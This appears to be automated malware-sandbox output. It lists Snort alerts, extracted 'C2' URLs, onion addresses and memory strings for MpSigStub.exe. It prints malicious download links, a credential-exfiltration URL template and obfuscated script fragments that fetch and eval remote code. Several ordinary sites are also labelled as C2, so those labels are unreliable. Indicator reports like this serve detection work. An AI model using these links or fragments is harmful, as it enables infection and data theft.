Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49812 -> 116.0.120.83:587
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://www.trotux.com/?z=
Source: Malware configuration extractor URLs: http://www.zhongsou.com/kefu/zskf.htm
Source: Malware configuration extractor URLs: http://www.w3.org/1999/xsl/transform
Source: Malware configuration extractor URLs: http://evanstechnology.com
Source: Malware configuration extractor URLs: http://41.59.0.100/intranet
Source: Malware configuration extractor URLs: http://www.microsoft.com
Source: Malware configuration extractor URLs: http://www.direct-ip.com/
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/index5.php?adv=141
Source: Malware configuration extractor URLs: http://spywaresoftstop.com/download/141/setup.exe
Source: Malware configuration extractor URLs: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: Malware configuration extractor URLs: http://gveejlsffxmfjlswjmfm.com/files/
Source: Malware configuration extractor URLs: http://so1.5k5.net/interface?action=install&p=
Source: Malware configuration extractor URLs: http://thespecsupportservice.com/uno.dat
Source: Malware configuration extractor URLs: http://110.42.4.180:
Source: Malware configuration extractor URLs: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: Malware configuration extractor URLs: http://aindonashi.blogspot.com/
Source: Malware configuration extractor URLs: http://www.alibaba.com
Source: Malware configuration extractor URLs: http://(www|corail)\\.sudoc
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/index2.php?adv=141
Source: Malware configuration extractor URLs: http://santasalete.sp.gov.br/jss/
Source: Malware configuration extractor URLs: http://acayipbiri.blogspot.com/
Source: Malware configuration extractor URLs: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: Malware configuration extractor URLs: http://xn--
Source: Malware configuration extractor URLs: http://a.pomf.cat/
Source: Malware configuration extractor URLs: http://cicahroti.blogspot.com/
Source: Malware configuration extractor URLs: http://22y456.com/
Source: Malware configuration extractor URLs: http://my-speak.eu/csioj.exe
Source: Malware configuration extractor URLs: http://babukq4e2p4wu4iq.onion
Source: Malware configuration extractor URLs: http://62.210.214.
Source: Malware configuration extractor URLs: http://articlunik.blogspot.com/
Source: Malware configuration extractor URLs: http://spotdewasa.blogspot.com/
Source: Malware configuration extractor URLs: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: Malware configuration extractor URLs: http://www.nytimes.com
Source: Malware configuration extractor URLs: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: Malware configuration extractor URLs: http://d1.downxia.net/products/
Source: Malware configuration extractor URLs: http://www.gamedanji.cn/ExeIni
Source: Malware configuration extractor URLs: http://aitimatafb.blogspot.com/
Source: Malware configuration extractor URLs: http://berkah2013.blogspot.com/
Source: Malware configuration extractor URLs: http://bigboobsp.blogspot.com/
Source: Malware configuration extractor URLs: http://aspeja.org/question/
Source: Malware configuration extractor URLs: http://www.apple.com
Source: Malware configuration extractor URLs: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: Malware configuration extractor URLs: http://microhelptech.com/gotoassist/
Source: Malware configuration extractor URLs: http://pastebin.com/
Source: Malware configuration extractor URLs: http://www.fastclick.com
Source: Malware configuration extractor URLs: http://errors.statsmyapp.com
Source: Malware configuration extractor URLs: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor URLs: http://musah.info/
Source: Malware configuration extractor URLs: http://%s/buy_online.php
Source: Malware configuration extractor URLs: http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung
Source: Malware configuration extractor URLs: http://www.tripod.com
Source: Malware configuration extractor URLs: http://batrasiaku.blogspot.com/
Source: Malware configuration extractor URLs: http://gaigoixxx.blogspot.com/
Source: Malware configuration extractor URLs: http://www.sqwire.com
Source: Malware configuration extractor URLs: http://arthisoft.blogspot.com/
Source: Malware configuration extractor URLs: http://www.steelbendersrfq.cf/
Source: Malware configuration extractor URLs: http://gg
Source: Malware configuration extractor URLs: http://www.
Source: Malware configuration extractor URLs: http://yamaofficial.com/rxuczm/3415201.png
Source: Malware configuration extractor URLs: http://www.xanga.com
Source: Malware configuration extractor URLs: http://www.cnn.com
Source: Malware configuration extractor URLs: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
Source: Malware configuration extractor URLs: http://wmwifbajxxbcxmucxmlc.com/files/
Source: Malware configuration extractor URLs: http://81.177.26.20/ayayay
Source: Malware configuration extractor URLs: http://i.compucrush.com/i.php
Source: Malware configuration extractor URLs: http://jugnitv.com/final.jpg
Source: Malware configuration extractor URLs: http://www.consumerinput.com/
Source: Malware configuration extractor URLs: http://104.236.94.
Source: Malware configuration extractor URLs: http://cl.1ck.me/
Source: Malware configuration extractor URLs: http://seuufhehfueughek.ws/
Source: Malware configuration extractor URLs: http://bonkersmen.blogspot.com/
Source: Malware configuration extractor URLs: http://www.j.mp/
Source: Malware configuration extractor URLs: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: Malware configuration extractor URLs: http://www.mlb.com
Source: Malware configuration extractor URLs: http://www.friskypotato.com/
Source: Malware configuration extractor URLs: http://tumicy.com/plqijcndwoisdhsaow/
Source: Malware configuration extractor URLs: http://pages
Source: Malware configuration extractor URLs: http://www.yahoo.com
Source: Malware configuration extractor URLs: http://whatami.us.to/tc
Source: Malware configuration extractor URLs: http://darkside
Source: Malware configuration extractor URLs: http://www.monster.com
Source: Malware configuration extractor URLs: http://www.netscape.com
Source: Malware configuration extractor URLs: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: Malware configuration extractor URLs: http://200.74.240.151/saturno/w8.txt
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/index4.php?adv=141
Source: Malware configuration extractor URLs: http://download.zhongsou.com/cdsearch/
Source: Malware configuration extractor URLs: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: Malware configuration extractor URLs: http://brembotembo.com/doc.xls
Source: Malware configuration extractor URLs: http://cts.hotbar.com/trackedevent.aspx
Source: Malware configuration extractor URLs: http://%s/sync.php
Source: Malware configuration extractor URLs: http://31.192.210.
Source: Malware configuration extractor URLs: http://chemgioaz.blogspot.com/
Source: Malware configuration extractor URLs: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: Malware configuration extractor URLs: http://203.199.200.61
Source: Malware configuration extractor URLs: http://www.alexa.com
Source: Malware configuration extractor URLs: http://www.microsoft.com0
Source: Malware configuration extractor URLs: http://8nasrcity.blogspot.com/
Source: Malware configuration extractor URLs: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: Malware configuration extractor URLs: http://mydirecttube.com/
Source: Malware configuration extractor URLs: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: Malware configuration extractor URLs: http://aolopdephn.blogspot.com/
Source: Malware configuration extractor URLs: http://faithhotelghana.com
Source: Malware configuration extractor URLs: http://94.102.14.
Source: Malware configuration extractor URLs: http://www.diannaowang.com:8080
Source: Malware configuration extractor URLs: http://200.74.240.151/saturno/w7.txt
Source: Malware configuration extractor URLs: http://www.searchmaid.com/
Source: Malware configuration extractor URLs: http://www.moliv.com.br/stat/email0702/
Source: Malware configuration extractor URLs: http://%s%simg.jpg
Source: Malware configuration extractor URLs: http://gosgd.com
Source: Malware configuration extractor URLs: http://owwwc.com/mm/
Source: Malware configuration extractor URLs: http://pig.zhongsou.com/helpsimple/help.htm
Source: Malware configuration extractor URLs: http://avnisevinc.blogspot.com/
Source: Malware configuration extractor URLs: http://hostthenpost.org/uploads/
Source: Malware configuration extractor URLs: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: Malware configuration extractor URLs: http://www.lycos.com
Source: Malware configuration extractor URLs: http://192.189.25.17/cgbin/ukbros
Source: Malware configuration extractor URLs: http://208.95.104.
Source: Malware configuration extractor URLs: http://tempuri.org/
Source: Malware configuration extractor URLs: http://afkar.today/test_coming.training/w_f/
Source: Malware configuration extractor URLs: http://tsrv4.ws/
Source: Malware configuration extractor URLs: http://%domain%/config.php
Source: Malware configuration extractor URLs: http://dl.dropbox.com/u/
Source: Malware configuration extractor URLs: http://www.klikspaandelft.nl/
Source: Malware configuration extractor URLs: http://cs.zhongsou.com/
Source: Malware configuration extractor URLs: http://mitotl.com.mx/ups.com/
Source: Malware configuration extractor URLs: http://%s
Source: Malware configuration extractor URLs: http://autothich.blogspot.com/
Source: Malware configuration extractor URLs: http://march262020.com/files/
Source: Malware configuration extractor URLs: http://www.pornpassmanager.com/d
Source: Malware configuration extractor URLs: http://www.icq.com
Source: Malware configuration extractor URLs: http://%domain%/update.php
Source: Malware configuration extractor URLs: http://%s:%i%s
Source: Malware configuration extractor URLs: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&level=%d&gold=%d&stone=%d&cpname
Source: Malware configuration extractor URLs: http://tool.world2.cn/toolbar/
Source: Malware configuration extractor URLs: http://coltaddict.blogspot.com/
Source: Malware configuration extractor URLs: http://alindaenua.blogspot.com/
Source: Malware configuration extractor URLs: http://tinyurl.com/
Source: Malware configuration extractor URLs: http://www.virtrigger.com
Source: Malware configuration extractor URLs: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: Malware configuration extractor URLs: http://www.niudoudou.com/web/download/
Source: Malware configuration extractor URLs: http://millennium-traders.info
Source: Malware configuration extractor URLs: http://www.youndoo.com/?z=
Source: Malware configuration extractor URLs: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&amp;i=1a3a1a
Source: Malware configuration extractor URLs: http://200.159.128.
Source: Malware configuration extractor URLs: http://1bestgate.blogspot.com/
Source: Malware configuration extractor URLs: http://www.preyer.it/ups.com/
Source: Malware configuration extractor URLs: http://www.adserver.com
Source: Malware configuration extractor URLs: http://5starvideos.com/main/
Source: Malware configuration extractor URLs: http://march262020.club/files/
Source: Malware configuration extractor URLs: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&amp;dyfm=ywx2yxjvx3zlbgfzy29adndylmnvbq==&amp;dyfm=cpjyicit
Source: Malware configuration extractor URLs: http://www.surprisingdd.top
Source: Malware configuration extractor URLs: http://www.facebook.com/
Source: Malware configuration extractor URLs: http://agressor58.blogspot.com/
Source: Malware configuration extractor URLs: http://arifkacip.blogspot.com/
Source: Malware configuration extractor URLs: http://95.173.183.
Source: Malware configuration extractor URLs: http://bittupadam.blogspot.com/
Source: Malware configuration extractor URLs: http://94.103.85.236/ds/11.gif
Source: Malware configuration extractor URLs: http://www.%domain%/updates/check.html
Source: Malware configuration extractor URLs: http://srmvx.com.br/uploads/
Source: Malware configuration extractor URLs: http://webpatch.ragnarok.co.kr/
Source: Malware configuration extractor URLs: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
Source: Malware configuration extractor URLs: http://alhalm-now.blogspot.com/
Source: Malware configuration extractor URLs: http://fateh.aba.ae/abc.zip
Source: Malware configuration extractor URLs: http://abeidaman.blogspot.com/
Source: Malware configuration extractor URLs: http://131.153.38.125/
Source: Malware configuration extractor URLs: http://www.amazon.com
Source: Malware configuration extractor URLs: http://%s/support.php
Source: Malware configuration extractor URLs: http://50.63.128.
Source: Malware configuration extractor URLs: http://animefrase.blogspot.com/
Source: Malware configuration extractor URLs: http://booknology.com/
Source: Malware configuration extractor URLs: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: Malware configuration extractor URLs: http://bgtc.pctonics.com
Source: Malware configuration extractor URLs: http://rentalhabneew.com/
Source: Malware configuration extractor URLs: http://maldonaaloverainc.com/
Source: Malware configuration extractor URLs: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: Malware configuration extractor URLs: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: Malware configuration extractor URLs: http://batysnewskz.kz/ups.com
Source: Malware configuration extractor URLs: http://61.19.253.
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/index3.php?adv=141
Source: Malware configuration extractor URLs: http://%s:%d/%d%s
Source: Malware configuration extractor URLs: http://179.43.158.187/PhtJFr0fvBk2.php
Source: Malware configuration extractor URLs: http://spywaresoftstop.com/load.php?adv=141
Source: Malware configuration extractor URLs: http://wevx.xyz/post.php?uid=
Source: Malware configuration extractor URLs: http://dontkillme/
Source: Malware configuration extractor URLs: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: Malware configuration extractor URLs: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: Malware configuration extractor URLs: http://highpay.website/css/windows.jar
Source: Malware configuration extractor URLs: http://update.7h4uk.com:443/antivirus.php
Source: Malware configuration extractor URLs: http://update.xiaoshoupeixun.com/tsbho.ini
Source: Malware configuration extractor URLs: http://hotedeals.co.uk/ekck095032/
Source: Malware configuration extractor URLs: http://gosgd2.com
Source: Malware configuration extractor URLs: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: Malware configuration extractor URLs: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: Malware configuration extractor URLs: http://ahmad-roni.blogspot.com/
Source: Malware configuration extractor URLs: http://citw-vol2.blogspot.com/
Source: Malware configuration extractor URLs: http://%s:%d/%s%d%08d
Source: Malware configuration extractor URLs: http://kolyherqylwa9ru.top/log.php?f=400",zigmep0());ixunlaw4=samagsi0[awolgify4()]();ypjatlaci6[ygulsivko6()]=krubyfacifv2();erqylwa9=samagsi0[hojmed4()];geqilra0=wmetoqe0[betyquzt6()];}ixunlaw4=ypjatlaci6[azgorpydbibd4()]();ixunlaw4=ypjatlaci6[ildig0()](erqylwa9);ixunlaw4=ypjatlaci6[onesothaz0()](kqoctim8+lcacsovy5);ixunlaw4=ypjatlaci6[oxkucfur4()]();ixunlaw4=iliqof8[agajdojj9()](rpolje4()+kqoctim8+lcacsovy5,zigmep0());}catch(e){}
Source: Malware configuration extractor URLs: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor URLs: http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung
Source: Malware configuration extractor URLs: http://cvfanatic.blogspot.com/
Source: Malware configuration extractor URLs: http://www.qq994455.com/
Source: Malware configuration extractor URLs: http://20vp.cn/moyu/
Source: Malware configuration extractor URLs: http://www.ebay.com
Source: Malware configuration extractor URLs: http://fateh.aba.ae/xyzx.zip
Source: Malware configuration extractor URLs: http://3dplayful.blogspot.com/
Source: Malware configuration extractor URLs: http://vequiato.sites.uol.com.br/
Source: Malware configuration extractor URLs: http://malikberry.com/files101/htamandela.hta
Source: Malware configuration extractor URLs: http://bbc.lumpens.org/
Source: Malware configuration extractor URLs: http://verticalagriculture.net/files/csrss.jar
Source: Malware configuration extractor URLs: http://31.192.209.
Source: Malware configuration extractor URLs: http://31.192.211.
Source: Malware configuration extractor URLs: http://lo0oading.blogspot.com/
Source: Malware configuration extractor URLs: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: Malware configuration extractor URLs: http://best4hack.blogspot.com/
Source: Malware configuration extractor URLs: http://www.mapquest.com
Source: Malware configuration extractor URLs: http://ip-api.com/json/
Source: Malware configuration extractor URLs: http://888888.2288.org/Monitor_INI
Source: Malware configuration extractor URLs: http://te.platrium.com/pte.aspx
Source: Malware configuration extractor URLs: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com"target="_blank
Source: Malware configuration extractor URLs: http://config.juezhao123.com/c.ashx?ver=&c=
Source: Malware configuration extractor URLs: http://brembotembo.com/2.dat
Source: Malware configuration extractor URLs: http://%s:%i%s?mod=cmd
Source: Malware configuration extractor URLs: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: Malware configuration extractor URLs: http://checkip.dyndns.org/
Source: Malware configuration extractor URLs: http://whenyouplaygood.com/s/gate.php?a");f["\x73\x65\x6e\x64"]();eval(f["responsetext"
Source: Malware configuration extractor URLs: http://www.nba.com
Source: Malware configuration extractor URLs: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: Malware configuration extractor URLs: http://www.agendagyn.com/media/fotos/2010/
Source: Malware configuration extractor URLs: http://www.thon-samson.be/js/_notes/
Source: Malware configuration extractor URLs: http://anomaniez.blogspot.com/
Source: Malware configuration extractor URLs: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor URLs: http://binyousafindustries.com/fonts/jo/mops.exe
Source: Malware configuration extractor URLs: http://%s/features.php
Source: Malware configuration extractor URLs: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: Malware configuration extractor URLs: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: Malware configuration extractor URLs: http://92.222.7.
Source: Malware configuration extractor URLs: http://brembotembo.com/1.dat
Source: Malware configuration extractor URLs: http://ow.ly/QoHbJ
Source: Malware configuration extractor URLs: http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d
Source: Malware configuration extractor URLs: http://aancyber77.blogspot.com/
Source: Malware configuration extractor URLs: http://2010-kpss.blogspot.com/
Source: Malware configuration extractor URLs: http://www.sacbarao.kinghost.net/
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/allfile.jpg
Source: Malware configuration extractor URLs: http://5starvideos.com/main/K
Source: Malware configuration extractor URLs: http://sf3q2wrq34.ddns.net
Source: Malware configuration extractor URLs: http://www.ip2location.com/
Source: Malware configuration extractor URLs: http://88888888.7766.org/ExeIni
Source: Malware configuration extractor URLs: http://worm.ws/
Source: Malware configuration extractor URLs: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: Malware configuration extractor URLs: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw
Source: Malware configuration extractor URLs: http://dudethisishowwedoitallnightlong.2myip.net
Source: Malware configuration extractor URLs: http://dmww.dmcast.com/script/update.asp?version=%s
Source: Malware configuration extractor URLs: http://docs.herobo.com
Source: Malware configuration extractor URLs: http://directplugin.com/dialers/
Source: Malware configuration extractor URLs: http://www.xpassgenerator.com/software/d
Found Tor onion address
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49812 -> 116.0.120.83:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hKAWruhccvaKl722JOqs1briWjn1s8ks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g7dge6jvaanlcs7829hvlmboru4ioabe/1634024250000/16524389560697724177/*/1hKAWruhccvaKl722JOqs1briWjn1s8ks?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49812 -> 116.0.120.83:587
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://%%PingRtt%%/t.ashx
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://%61%63%67%6c%67%6f%61%2e%63%6f%6d/h.js
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://%63%61%39%78%2e%63%6f%6d/ken.gif
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:%d/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:%d/%d/%d/%d/%d/%d/%d/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://%s%simg.jpg
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.com/registerguid.php?guid=
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://%s/%s/s_estr.php?id=%s&str=705-%sd
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://%s/%s/s_report.php?task=%u&id=%s
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.phpa
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://%s/ftp/g.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://%s/go.php?gcode=%s
Source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://%s/in.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%d
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%dxL
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://%s/jbinfo.cgi?%s:%d
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://%s/js.php?affid=%s&kw=%s
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://%s/poiehrgb.php?&advid=0000
